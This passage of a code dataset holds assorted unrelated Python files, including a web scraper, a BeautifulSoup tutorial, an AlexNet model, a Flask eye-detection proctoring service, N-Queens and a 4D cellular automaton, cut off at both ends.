roles.append(rol)\n r += 1\n # Reindex the security-related index on p_o if required\n if o: o.reindex(fields=('Allowed',))\n return r\n\n def delete(self, login=None, role=None, o=None):\n '''Ungrants, for a given p_login, some local p_role. Returns the number\n of actually deleted local roles.'''\n\n # If p_login is None, is ungrants p_role for every login mentioned in\n # local roles. If p_login is a list/tuple, it ungrants p_role to those\n # p_logins.\n\n # If p_role is None, it ungrants all previously granted roles to\n # p_login. If p_role is a list/tuple, if ungrants those roles to\n # p_login.\n\n # For parameter p_o, same remark as for m_add.\n\n if not login and not role: raise Exception(NO_LOGIN_AND_ROLE)\n r = 0\n if not role:\n # Ungrant to p_login every previously granted role\n if isinstance(login, str): login = (login,)\n for l in login:\n if l in self:\n del(self[l])\n r += 1\n else:\n # To what login(s) must we ungrant p_role(s) ?\n if not login:\n # To anyone having local roles on this object\n login = list(self.keys())\n # Else: to the login(s) specified in p_login\n elif isinstance(login, str): login = (login,)\n # Ungrant roles\n if isinstance(role, str): role = (role,)\n for l in login:\n if l not in self: continue\n roles = self[l]\n for rol in role:\n if rol in roles:\n roles.remove(rol)\n r += 1\n # Remove the entry if no more role is granted to this login\n if not roles:\n del(self[l])\n # Reindex the security-related index if required\n if o: o.reindex(fields=('Allowed',))\n return r\n\n def reset(self, o=None):\n '''Removes all local roles stored on p_self. 
If p_o is given, local role\n \"Owner\" is granted to p_o's creator.'''\n self.clear()\n if o: self.add(o.creator, 'Owner')\n\n def getLoginsHaving(self, role):\n '''Gets all logins having local p_role on this object'''\n r = set()\n for login, roles in self.items():\n if role in roles:\n r.add(login)\n return r\n#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n","sub_path":"appy/model/workflow/localRoles.py","file_name":"localRoles.py","file_ext":"py","file_size_in_byte":4772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"36401027","text":"# -*- coding: utf-8 -*-\r\ndata = {'s1': {'name': 'haifeng', 'age': 17, 'grade': 1, 'class': 3}}\r\n\r\nimport yaml\r\n\r\nyaml.dump(data, default_flow_style=False)\r\ndef parse_dict(d1, layer=0):\r\n msg_text = \"\"\r\n print('d1', d1)\r\n for k, v in d1.items():\r\n print('d1 k: ' + k + ', d1 v: %s' % v) \r\n print('*'*30, 'layer', layer)\r\n if type(v) == dict:\r\n self_layer=layer+2\r\n inner_msg = parse_dict(v, layer=self_layer) \r\n inner_msg.replace('\\n', '\\n' + ' ' * self_layer)\r\n msg_text = msg_text + inner_msg\r\n #return msg_text\r\n else:\r\n if type(v) == int:\r\n #print 'str(v)', v\r\n v = str(v)\r\n\r\n if v == None:\r\n v = \"none\"\r\n #print \"v = none\", v\r\n \r\n if v == True:\r\n v = 'True'\r\n \r\n if v == False:\r\n v = 'False'\r\n\r\n #print \"k:\" ,k ,\"v: \",v\r\n msg_text = msg_text + k + \": \" + v +'\\n'\r\n\r\n return msg_text\r\n \r\n\r\ndef parse_data(d1, layer=0):\r\n msg_text=\"\"\r\n for k,v in d1.items():\r\n msg_text = msg_text + k +'\\n'\r\n return msg_text\r\n \r\n#print '*'*0\r\n#data= item_dict(data)\r\n#data= parse_dict(data['s1'])\r\ndata= parse_dict(data)\r\nprint('-'*30)\r\nprint(data)\r\n","sub_path":"beyond/liaoxuefeng/dict_recursive/dict_recursive_1.py","file_name":"dict_recursive_1.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"648439576","text":"from sentry.grouping.component import GroupingComponent\nfrom sentry.grouping.strategies.base import strategy, produces_variants\n\n\n@strategy(id=\"template:v1\", interfaces=[\"template\"], score=1100)\n@produces_variants([\"default\"])\ndef template_v1(template, context, **meta):\n filename_component = GroupingComponent(id=\"filename\")\n if template.filename is not None:\n filename_component.update(values=[template.filename])\n\n context_line_component = GroupingComponent(id=\"context-line\")\n if template.context_line is not None:\n context_line_component.update(values=[template.context_line])\n\n return {\n context[\"variant\"]: GroupingComponent(\n id=\"template\", values=[filename_component, context_line_component]\n )\n }\n","sub_path":"src/sentry/grouping/strategies/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"362828947","text":"import re\nimport ply.lex\n\nR_HEX_ESC = re.compile(r\"\\\\x([a-fA-F0-9]{2})\")\ndef r_hex_esc(m):\n return chr(int(m.group(1), 16))\n\ndef sub_escs(s):\n return R_HEX_ESC.sub(s.replace(\"\\\\n\", \"\\n\").replace(\"\\\\r\", \"\\r\").replace(\"\\\\t\", \"\\t\"), r_hex_esc)\n\nregisters = [\n \"v0\", \"v1\", \"v2\", \"v3\", \"v4\", \"v5\", \"v6\", \"v7\",\n \"a0\", \"a1\", \"a2\", \"a3\", \"q0\", \"q1\", \"sp\", \"\",\n]\n\ntokens = [\n \"COLON\",\n \"COMMA\",\n \"IDENTIFIER\",\n \"INTEGER\",\n 
\"LBRACKET\",\n \"NEWLINE\",\n \"RBRACKET\",\n \"REGISTER\",\n \"STRING\",\n]\n\nt_COLON = r\":\"\nt_COMMA = r\",\"\nt_IDENTIFIER = r\"[._a-zA-Z][._a-zA-Z0-9]*\"\nt_LBRACKET = r\"\\[\"\nt_RBRACKET = r\"\\]\"\n\nt_ignore = r\" \\t\"\n\ndef t_coord(t):\n r\"<.+>\"\n \n fname, lineno = t[1:-1].split(\":\")\n t.lexer.lineno = fname, int(lineno)\n\ndef t_decint(t):\n r\"-?[1-9][0-9]*|0\"\n \n t.type = \"INTEGER\"\n t.value = int(t.value)\n return t\n\ndef t_hexint(t):\n r\"-?0x(?:[1-9a-fA-F][0-9a-fA-F]*|0)\"\n \n t.type = \"INTEGER\"\n t.value = int(t.value, 16)\n return t\n\ndef t_charlit(t):\n r\"'.+'\"\n \n t.type = \"INTEGER\"\n t.value = ord(sub_escs(t.value[1:-1]))\n return t\n\ndef t_NEWLINE(t):\n r\"[\\r\\n]+\"\n \n fname, lineno = t.lexer.lineno\n lineno += len(t.value.replace(\"\\r\\n\", \"\\n\"))\n t.lexer.lineno = fname, lineno\n return t\n\ndef t_REGISTER(t):\n r\"%(?:v[0-7]|a[0-3]|q[01]|sp)\"\n \n t.value = registers.index(t.value[1:])\n return t\n\ndef t_STRING(t):\n r\"\\\".+\\\"\"\n \n t.value = sub_escs(t.value[1:-1])\n return t\n\ndef t_error(t):\n errors.error(t.lineno, \"Invalid character '%s'\" % t.value[0])\n","sub_path":"k750/k750asm/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"169568031","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\ndef exploring(id_commune, id_departement, year, hashmap):\n\ttry:\n\t\tville = requests.get('http://alize2.finances.gouv.fr/communes/eneuro/detail.php?icom='\n\t\t\t+ \"%03d\"%id_commune + '&dep=' + \"%03d\"%id_departement\n\t\t\t+ '&type=BPS¶m=5&exercice=' + str(year) )\n\t\tsoup = BeautifulSoup(ville.text, 'html.parser')\n\n\t\tfor x in soup.find_all('tr') :\n\t\t\tif x.find_all(class_=\"libellepetit\") != [] and \"DEPARTEMENT\" in x.find_all(class_=\"libellepetit\")[0].text:\n\t\t\t\thashmap['departement'].append(x.find_all(class_=\"libellepetit\")[0].text.split(' : ')[1])\n\t\t\t\thashmap['commune'].append(x.find_all(class_=\"G\")[0].text)\n\t\t\t\thashmap['year'].append(year)\n\n\t\t\telif x.find_all(class_=\"libellepetit G\") != [] and \"TOTAL\" in x.find_all(class_=\"libellepetit G\")[0].text:\n\t\t\t\ttitle_M = x.find_all(class_=\"libellepetit G\")[0].text.split('>')[0].split(' = ')[0] + ' (Moyenne de la strate)'\n\t\t\t\ttitle_E = x.find_all(class_=\"libellepetit G\")[0].text.split('>')[0].split(' = ')[0] + ' (Euros par habitant)'\n\n\t\t\t\tif title_E not in hashmap.keys() and title_M not in hashmap.keys():\n\t\t\t\t\tprint(hashmap.keys())\n\t\t\t\t\thashmap[title_M] = x.find_all(class_=\"montantpetit G\")[2].text.replace('\\xa0','')\n\t\t\t\t\thashmap[title_E] = x.find_all(class_=\"montantpetit G\")[1].text.replace('\\xa0','')\n\t\t\t\telse:\n\t\t\t\t\thashmap[title_M].append( x.find_all(class_=\"montantpetit G\")[2].text.replace('\\xa0','') )\n\t\t\t\t\thashmap[title_E].append( x.find_all(class_=\"montantpetit G\")[1].text.replace('\\xa0','') )\n\t\treturn True\n\texcept:\n\t\treturn False\n \nfutur_df = {'year' : [], 'departement' : [], 'commune' : [], 'TOTAL DES PRODUITS DE FONCTIONNEMENT (Euros par habitant)' : [],\n'TOTAL DES PRODUITS DE FONCTIONNEMENT (Moyenne de la strate)' : [], 'TOTAL DES EMPLOIS D\\'INVESTISSEMENT (Moyenne de la strate)' : [],\n'TOTAL DES EMPLOIS D\\'INVESTISSEMENT (Euros par habitant)' : [], 'TOTAL DES CHARGES DE FONCTIONNEMENT (Euros par habitant)' : [],\n'TOTAL DES CHARGES DE FONCTIONNEMENT (Moyenne de la strate)' : [], 'TOTAL DES 
RESSOURCES D\\'INVESTISSEMENT (Euros par habitant)' : [],\n'TOTAL DES RESSOURCES D\\'INVESTISSEMENT (Moyenne de la strate)' : []}\n\nfor i in range(2010,2014):\n\tfor j in range (74, 77):\n\t\tis_exploring = True\n\t\tfor k in range(1, 10):\n\t\t\tprint('year ' + str(i) + ' departement ' + str(j) + ' commune ' + str(k) )\n\t\t\tis_exploring = exploring(k, j, i, futur_df)\n\t\t\tif not is_exploring:\n\t\t\t\tbreak\n\ndf = pd.DataFrame(futur_df)\ndf.to_csv('test.csv')\n","sub_path":"clement-begotto/Lesson2/exo_dom_02.py","file_name":"exo_dom_02.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"426108507","text":"# BeautifulSoup의 find(), select() \r\n\r\nfrom bs4 import BeautifulSoup\r\n\r\nhtml_page = \"\"\"\r\n\r\n

<html><body>\r\n<h1>제목 태그</h1>\r\n<p>웹 문서 읽기</p>\r\n<p>원하는 자료 선택</p>\r\n</body></html>\r\n\"\"\"\r\n\r\n#print(type(html_page)) # <class 'str'>\r\n#print(html_page) # html형태를 가진 문자열 \r\n\r\nsoup = BeautifulSoup(html_page, 'html.parser') # BeautifulSoup 객체생성\r\n#print(type(soup)) # BeautifulSoup이 제공하는 명령 사용가능\r\n\r\nh1 = soup.html.body.h1 # soup에 html안에 body안에 h1태그(태그까지)\r\nprint(\"h1 : \", h1.string) # 뽑아온 태그의 내용\r\n\r\np1 = soup.html.body.p # 최초의 p를 만남\r\nprint(\"p1 : \", p1.string)\r\n\r\np2 = p1.next_sibling.next_sibling\r\nprint(\"p2 : \", p2.string)\r\n\r\n\r\nprint(\"\\n\\nfind()를 사용\")\r\nhtml_page2 = \"\"\"\r\n<html><body>\r\n<h1 id=\"title\">제목 태그</h1>\r\n<p id=\"my\">웹 문서 읽기</p>\r\n<p>원하는 자료 선택</p>\r\n</body></html>\r\n\"\"\"\r\n\r\nsoup2 = BeautifulSoup(html_page2, 'html.parser')\r\nprint(soup2.p, ' ', soup2.p.string) # 직접 최초 tag선택\r\nprint(soup2.find('p').string)\r\nprint(soup2.find('p', id='my').string) # p태그의 id값을 선택해줘 출력\r\nprint(soup2.find_all('p')) # p태그를 전부 불러옴(태그도 같이 가져옴)\r\nprint(soup2.find(id='title').string) # id값만 선택하여 출력\r\nprint(soup2.find(id='my').string)\r\n\r\nprint(\"\\n\\nfind_all(), findAll()를 사용\")\r\nhtml_page3 = \"\"\"\r\n<html><body>\r\n<h1 id=\"title\">제목 태그</h1>\r\n<p id=\"my\">웹 문서 읽기</p>\r\n<p>원하는 자료 선택</p>\r\n<a href=\"https://www.naver.com\">naver</a>\r\n<a href=\"https://www.daum.net\">daum</a>\r\n</body></html>\r\n\"\"\"\r\n\r\nsoup3 = BeautifulSoup(html_page3, 'html.parser')\r\nprint(soup3.find('a'))\r\nprint(soup3.find('a').string)\r\nprint(soup3.find(['a']))\r\nprint(soup3.find_all(['a']))\r\nprint(soup3.findAll(['a']))\r\nprint(soup3.find_all('a'))\r\nprint(soup3.find_all(['a', 'p'])) # a태그, p태그 둘다 가져옴\r\n#print(soup3)\r\n#print(soup3.prettify())\r\n\r\nprint()\r\nlinks = soup3.find_all('a')\r\nprint(links)\r\nfor i in links:\r\n    href = i.attrs['href']\r\n    text = i.string\r\n    print(href, ' ', text)\r\n\r\nprint('\\n\\nfind() 정규 표현식 사용')\r\nimport re\r\n# https로 시작되는 데이터 \r\nlink2 = soup3.find_all(href=re.compile(r'^https'))\r\nprint(link2)\r\nfor k in link2:\r\n    print(k.attrs['href'])\r\n\r\nprint(\"\\n\\nselect()사용 (css의 selector)\")\r\nhtml_page4 = \"\"\"\r\n<html><body>\r\n<div id=\"hello\">\r\n<a href=\"https://www.naver.com\">naver</a>\r\n<span>\r\n<a href=\"https://www.daum.net\">daum</a>\r\n</span>\r\n<ul class=\"world\">\r\n<li>안녕</li>\r\n<li>반가워</li>\r\n</ul>\r\n</div>\r\n<div id=\"hi\">\r\nsecond div\r\n</div>\r\n</body></html>\r\n\"\"\"\r\nsoup4 = BeautifulSoup(html_page4, 'lxml')\r\naa = soup4.select_one(\"div#hello a\").string # 모든 \"div#hello a\" a태그를 읽어와야 하지만 select_one이라 하나만 읽음 \r\n#aa = soup4.select_one(\"div#hello > a\").string # 직계 바로 아래 자식에 존재하는 a태그만\r\nprint('aa : ', aa)\r\n\r\nbb = soup4.select(\"div#hello ul.world > li\") # 복수 선택 # div#hello ul : 자손 div#hello > ul : 직계\r\nprint('bb : ', bb) # bb : [<li>안녕</li>, <li>반가워</li>
  • ]\r\nfor i in bb:\r\n print('li : ', i.string)\r\n\r\n","sub_path":"python_Analysis1/pandas_test/pdex7.py","file_name":"pdex7.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"534770251","text":"import streamlit as st\nfrom dashboard.components import SideBar, MainArea\n\nfrom data.stocks import StockData\n\n# Configuration\nst.set_page_config(\n page_title=\"Stonks\",\n page_icon=\"🧊\",\n layout=\"wide\",\n initial_sidebar_state=\"expanded\",\n)\n\nstock_data = StockData()\nside_bar = SideBar(stock_data)\nstock_plot = MainArea(side_bar, stock_data)\nstock_plot.plot_history()\nstock_plot.plot_technical_indicators()\nstock_plot.plot_financials()\n","sub_path":"stonks/stonks.py","file_name":"stonks.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"241203984","text":"import tensorflow as tf\n\ndef AlexNet(x, keep_prob, num_classes):\n # 第一层: Conv (w ReLu) -> Lrn -> Pool\n conv1 = conv(x, 11, 11, 96, 4, 4, padding='VALID', name='conv1')\n norm1 = lrn(conv1, 2, 2e-05, 0.75, name='norm1')\n pool1 = max_pool(norm1, 3, 3, 2, 2, padding='VALID', name='pool1')\n \n # 第二层: Conv (w ReLu) -> Lrn -> Pool with 2 groups\n conv2 = conv(pool1, 5, 5, 256, 1, 1, groups=2, name='conv2')\n norm2 = lrn(conv2, 2, 2e-05, 0.75, name='norm2')\n pool2 = max_pool(norm2, 3, 3, 2, 2, padding='VALID', name='pool2')\n \n # 第三层: Conv (w ReLu)\n conv3 = conv(pool2, 3, 3, 384, 1, 1, name='conv3')\n\n # 第四层: Conv (w ReLu) \n conv4 = conv(conv3, 3, 3, 384, 1, 1, groups=2, name='conv4')\n\n # 第五层: Conv (w ReLu) -> Pool 拆分两组 \n conv5 = conv(conv4, 3, 3, 256, 1, 1, groups=2, name='conv5')\n pool5 = max_pool(conv5, 3, 3, 2, 2, padding='VALID', name='pool5')\n\n # 第六层: Flatten -> FC (w ReLu) -> Dropout\n flattened = tf.reshape(pool5, [-1, 6*6*256])\n fc6 = fc(flattened, 6*6*256, 4096, name='fc6')\n dropout6 = dropout(fc6, keep_prob)\n\n # 第七层: FC (w ReLu) -> Dropout\n fc7 = fc(dropout6, 4096, 4096, name='fc7')\n dropout7 = dropout(fc7, keep_prob)\n\n # 第八层全连接层没有 relu激活层: FC \n fc8 = fc(dropout7, 4096, num_classes, relu = False, name='fc8')\n return fc8\n\ndef conv(x, filter_height, filter_width, num_filters, stride_y, stride_x, name,\n padding='SAME', groups=1):\n # 输入通道数数量 \n input_channels = int(x.get_shape()[-1])\n\n # 创建权重和偏差值 \n with tf.variable_scope(name) as scope:\n weights = tf.get_variable('weights', shape=[filter_height,\n filter_width,\n input_channels/groups,\n num_filters])\n biases = tf.get_variable('biases', shape=[num_filters])\n\n if groups == 1:\n conv = tf.nn.conv2d(x, weights,\n strides=[1, stride_y, stride_x, 1],\n padding=padding)\n # 在有多组的情况下,拆分输入权重\n else:\n # 拆分输入和权重并进行卷积\n input_x = tf.split(axis=3, num_or_size_splits=groups, value=x)\n weight_w = tf.split(axis=3, num_or_size_splits=groups,\n value=weights)\n output_groups = []\n for i, k in zip(input_x, weight_w):\n output_conv2d = tf.nn.conv2d(i, k,\n strides=[1, stride_y, stride_x, 1],\n padding=padding)\n output_groups.append(output_conv2d)\n # 创建连接 \n conv = tf.concat(axis=3, values=output_groups)\n\n # 偏差值 \n bias = tf.reshape(tf.nn.bias_add(conv, biases), tf.shape(conv))\n\n # 激活函数Relu \n relu = tf.nn.relu(bias, name=scope.name)\n return relu\n\n# 创建全连接层\ndef fc(x, num_in, num_out, name, relu=True):\n with tf.variable_scope(name) as scope:\n # 创建权重和偏差值 \n weights = tf.get_variable('weights', shape=[num_in, num_out],\n trainable=True)\n biases = 
tf.get_variable('biases', [num_out], trainable=True)\n\n # 计算多个输入,权重,偏差值 \n act = tf.nn.xw_plus_b(x, weights, biases, name=scope.name)\n if relu == True:\n return tf.nn.relu(act)\n else:\n return act\n\n# 创建max_pool最大池化层\ndef max_pool(x, filter_height, filter_width, stride_y, stride_x, name,\n padding='SAME'):\n return tf.nn.max_pool(x, ksize=[1, filter_height, filter_width, 1],\n strides=[1, stride_y, stride_x, 1],\n padding=padding, name=name)\n\n# 创建 LRN 层\ndef lrn(x, radius, alpha, beta, name, bias=1.0):\n return tf.nn.local_response_normalization(x, depth_radius=radius,\n alpha=alpha, beta=beta,\n bias=bias, name=name)\n\n# 创建dropout层\ndef dropout(x, keep_prob):\n return tf.nn.dropout(x, rate=1-keep_prob)","sub_path":"Alexnet实现猫狗分类/alexnet.py","file_name":"alexnet.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"446811035","text":"from django.contrib import admin\nfrom .models import Webcrafting, CallBack\n\nclass WebcraftingModelAdmin(admin.ModelAdmin):\n class Meta:\n model = Webcrafting\n\n list_display = [\"title\", \"portfolio_updated\", \"portfolio_time\"]\n list_filter = [\"portfolio_updated\", \"portfolio_time\"]\n\nclass WebcraftingModelAdminContactForm(admin.ModelAdmin):\n class Meta:\n model = CallBack\n\n list_display = [\"your_name\",\n \"your_email\",\n \"your_phone\",\n \"your_message\",\n \"contact_time\",\n \"contact_updated\",\n \"checked\"]\n list_filter = [\"contact_updated\", \"contact_time\", \"checked\"]\n\n\nadmin.site.register(Webcrafting, WebcraftingModelAdmin)\nadmin.site.register(CallBack, WebcraftingModelAdminContactForm)\n","sub_path":"portfolio/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"576832684","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[32]:\n\n\nfrom flask import Flask, request, jsonify\nimport cv2, glob, sys, os\n#from PIL import Image\n#from flask_restful import Resource, Api\n \napp = Flask(__name__)\n\n@app.route('/cheat/', methods=['GET'])\ndef respond():\n # Retrieve the name from url parameter\n path = request.args.get(\"path\", None)\n \n p=os.path.split(path)[0]\n path1 = p +\"/\"+ \"cheat\" + \"/\"\n print(path1)\n \n try:\n os.mkdir(path1)\n except OSError:\n print (\"Creation of the directory %s failed\" % path1)\n else:\n print (\"Successfully created the directory %s \" % path1)\n \n # For debugging\n print(f\"got path {path}\")\n response = {}\n cheat_bool = 0\n cheating_attempts = 0\n a=[]\n compression_factor = [cv2.IMWRITE_PNG_COMPRESSION, 9]\n eye_cascade_path = \"haarcascade_eye.xml\"\n eye_cascade = cv2.CascadeClassifier(eye_cascade_path)\n for file in glob.glob(path):\n frame= cv2.imread(file)\n yuv = cv2.cvtColor(frame, cv2.COLOR_BGR2YUV)\n yuv[:, :, 0] = cv2.equalizeHist(yuv[:, :, 0])\n bgr_frame = cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR)\n gray = cv2.cvtColor(bgr_frame, cv2.COLOR_BGR2GRAY)\n clahe = cv2.createCLAHE(clipLimit=40.0, tileGridSize=(8, 8))\n gray = clahe.apply(gray)\n eyes = eye_cascade.detectMultiScale(gray, scaleFactor=1.3, minNeighbors=5)\n for (x, y, width, height) in eyes:\n cv2.rectangle(frame, (x, y), (x + width, y + height), (0, 255, 0), 2)\n break\n if len(eyes) == 0:\n cheat_bool = 1\n else:\n gray_cropped_right = gray[eyes[0][1]: eyes[0][1] + eyes[0][3],\n eyes[0][0] + eyes[0][2] // 2: eyes[0][0] + eyes[0][2]]\n cv2.GaussianBlur(gray_cropped_right, (3, 3), 16)\n\n 
if cheat_bool == 1:\n cheating_attempts += 1\n # cheating_attempts.append\n b= os.path.splitext(os.path.basename(file))[0]\n a.append(b)\n \n y = cv2.resize(frame, (128, 72), interpolation = cv2.INTER_AREA)\n cv2.imwrite(path1 + str(os.path.splitext(os.path.basename(file))[0]) + \"_cheat\" + \".png\", y, compression_factor)#working\n # Reset value of cheat_bool to catch further such instances - in case they happen\n cheat_bool = 0\n\n # Return the response in json format\n return jsonify(a)\n\n@app.route('/post/', methods=['POST'])\ndef post_something():\n param = request.form.get('path')\n print(param)\n \n@app.route('/')\ndef index():\n return \"

    To test go to http://127.0.0.1:5000/cheat/?path=[yourdirectory]!!
    \"\n\nif __name__ == '__main__':\n # Threaded option to enable multiple instances for multiple user access support\n app.run(threaded=True, port=5000)\n\n\n# In[20]:\n\n\n#print(os.path.splitext(os.path.basename(path))[0])\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"autoinvig.py","file_name":"autoinvig.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"374186216","text":"class Solution:\n # @return a list of lists of string\n def solveNQueens(self, n):\n self.ret=[]\n board=[[\".\" for i in xrange(n) ] for i in xrange(n) ]\n self.solve(board,0,n)\n return self.ret\n\n def solve(self, board, m, n):\n if m==n:\n result=[''.join(i) for i in board]\n self.ret.append(result)\n return\n for i in xrange(n):\n canput=True\n for j in range(0,m):\n if board[j][i]==\"Q\": canput=False\n for j in range(1,min(i+1,m+1)):\n if board[m-j][i-j]==\"Q\": canput=False\n for j in range(1,min(n-i,m+1)):\n if board[m-j][i+j]==\"Q\": canput=False\n if canput:\n board[m][i]=\"Q\"\n self.solve(board,m+1,n)\n board[m][i]=\".\"\n\n \n\n\n\na=Solution()\na.solveNQueens(4)\n\n","sub_path":"python/questiones/051_nqueens.py","file_name":"051_nqueens.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"529212831","text":"#-*- coding:utf-8 -*-\n\nimport tkinter as tk # python 3\nfrom tkinter import font as tkfont # python 3\nfrom start_page import StartPage\nfrom detect_page import *\nfrom manual_page import *\nfrom auto_page import AutoPage\nfrom spray_mode import *\n\nclass MainApp(tk.Tk):\n\n def __init__(self, *args, **kwargs):\n tk.Tk.__init__(self, *args, **kwargs)\n\n #이미지 관리\n imgBgEmpty = tk.PhotoImage(file='images/bg_empty.png')\n imgBgDetect = tk.PhotoImage(file='images/bg_detect.png')\n imgBgAuto = tk.PhotoImage(file='images/bg_auto.png')\n imgBgManual = tk.PhotoImage(file='images/bg_manual.png')\n self.imgBtnBack = tk.PhotoImage(file='images/btnBack.png')\n\n if platform.system() == \"Linux\":\n wpi.wiringPiSetup()\n wpi.pinMode(4, 1)\n \n self.sprayMode = SprayMode.MANUAL\n\n # the container is where we'll stack a bunch of frames\n # on top of each other, then the one we want visible\n # will be raised above the others\n container = tk.Frame(self)\n container.pack(side=\"top\", fill=\"both\", expand=True)\n container.grid_rowconfigure(0, weight=1)\n container.grid_columnconfigure(0, weight=1)\n\n if platform.system() == \"Linux\":\n container.config(cursor=\"none\")\n\n self.attributes()\n\n self.frames = {}\n for F in (StartPage, DetectPage, ManualPage, AutoPage):\n page_name = F.__name__\n if F == StartPage:\n bg_img = imgBgEmpty\n elif F == DetectPage:\n bg_img = imgBgDetect \n elif F == ManualPage:\n bg_img = imgBgManual\n elif F == AutoPage:\n bg_img = imgBgAuto\n\n frame = F(parent=container, controller=self, background_img=bg_img)\n self.frames[page_name] = frame\n\n # put all of the pages in the same location;\n # the one on the top of the stacking order\n # will be the one that is visible.\n frame.grid(row=0, column=0, sticky=\"nsew\")\n\n self.show_frame(\"StartPage\")\n\n def show_frame(self, page_name):\n '''Show a frame for the given page name'''\n frame = self.frames[page_name]\n if page_name == 'ManualPage':\n frame.spray_on_check = False\n frame.init_spray()\n frame.change_spray_btn()\n\n frame.tkraise()\n\n def setSprayMode(self, sprayMode):\n self.sprayMode = sprayMode\n\nif __name__ == \"__main__\":\n 
app = MainApp()\n app.title(\"천연살균의학처 방역 시스템\")\n app.geometry(\"1024x600\")\n \n if platform.system() == \"Linux\":\n app.attributes(\"-fullscreen\",True)\n \n app.resizable(False, False)\n app.mainloop()","sub_path":"nsc_app.py","file_name":"nsc_app.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"277417125","text":"from dataclasses import dataclass\n\nclass Grid:\n def __init__(self, initial_2d_slice):\n self.grid = {0: {0: self.parse(initial_2d_slice)}}\n self.xbounds = [0, len(self.grid[0][0][0])]\n self.ybounds = [0, len(self.grid[0][0])]\n self.zbounds = [0, 1]\n self.wbounds = [0, 1]\n\n def parse(self, string):\n grid_2d = {}\n for index, line in enumerate(string.strip().split('\\n')):\n grid_2d[index] = {i: (ch == '#') for i, ch in enumerate(line)}\n return grid_2d\n\n def cycle(self):\n newgrid = {}\n for w in self.bigger_range(*self.wbounds):\n newgrid[w] = {}\n for z in self.bigger_range(*self.zbounds):\n newgrid[w][z] = {}\n for y in self.bigger_range(*self.ybounds):\n newgrid[w][z][y] = {}\n for x in self.bigger_range(*self.xbounds):\n cube = self[x, y, z, w]\n neighbour_count = list(self.neighbours_of(x, y, z, w)).count(True)\n if cube:\n if neighbour_count == 2 or neighbour_count == 3:\n newgrid[w][z][y][x] = True\n else:\n newgrid[w][z][y][x] = False\n else:\n if neighbour_count == 3:\n newgrid[w][z][y][x] = True\n else:\n newgrid[w][z][y][x] = False\n \n self.grid = newgrid\n self.xbounds = [self.xbounds[0]-1, self.xbounds[1]+1]\n self.ybounds = [self.ybounds[0]-1, self.ybounds[1]+1]\n self.zbounds = [self.zbounds[0]-1, self.zbounds[1]+1]\n self.wbounds = [self.wbounds[0]-1, self.wbounds[1]+1]\n\n def neighbours_of(self, x, y, z, w):\n for w_offset in range(-1, 2):\n if w + w_offset in range(*self.wbounds):\n for z_offset in range(-1, 2):\n if z + z_offset in range(*self.zbounds):\n for y_offset in range(-1, 2):\n if y + y_offset in range(*self.ybounds):\n for x_offset in range(-1, 2):\n if x + x_offset in range(*self.xbounds) and not (w_offset == z_offset == y_offset == x_offset == 0):\n yield self[x + x_offset,\n y + y_offset,\n z + z_offset,\n w + w_offset]\n\n def bigger_range(self, *bounds):\n yield min(bounds) - 1\n yield from range(*bounds)\n yield max(bounds)\n\n def count_active(self):\n count = 0\n for w in range(*self.wbounds):\n for z in range(*self.zbounds):\n for y in range(*self.ybounds):\n for x in range(*self.xbounds):\n if self[x, y, z, w]:\n count += 1\n return count\n\n def __getitem__(self, index):\n x, y, z, w = index\n try:\n return self.grid[w][z][y][x]\n except KeyError:\n return False\n\n def __str__(self):\n s = \"\"\n for w in sorted(self.grid.keys()):\n for z in sorted(self.grid[w].keys()):\n s += f\"z={z}, w={w}\\n\"\n for y in sorted(self.grid[w][z].keys()):\n s += \"\".join(('#' if self.grid[w][z][y][x] else '.') for x in sorted(self.grid[w][z][y].keys()))\n s += \"\\n\"\n s += \"\\n\"\n return s\n\n\nwith open(\"day17.in\") as f:\n grid = Grid(f.read())\n\nfor _ in range(6):\n grid.cycle()\nprint(grid.count_active())\n","sub_path":"day17_pt2.py","file_name":"day17_pt2.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"250121889","text":"from transformers import AutoModelForSequenceClassification, AutoConfig\nimport os\nimport time\nfrom tqdm import tqdm\nimport torch\nfrom torch.optim import AdamW\nfrom sklearn.metrics import 
